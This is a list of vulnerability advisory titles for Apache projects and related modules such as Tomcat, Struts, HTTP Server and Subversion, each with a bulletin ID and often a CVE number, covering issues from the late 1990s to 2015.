| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
14240| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
14241| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
14242| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
14243| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
14244| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
| [46953] Apache MPM-ITK Module Security Weakness
| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
| [46166] Apache Tomcat JVM Denial of Service Vulnerability
| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
| [44616] Apache Shiro Directory Traversal Vulnerability
| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
| [42492] Apache CXF XML DTD Processing Security Vulnerability
| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
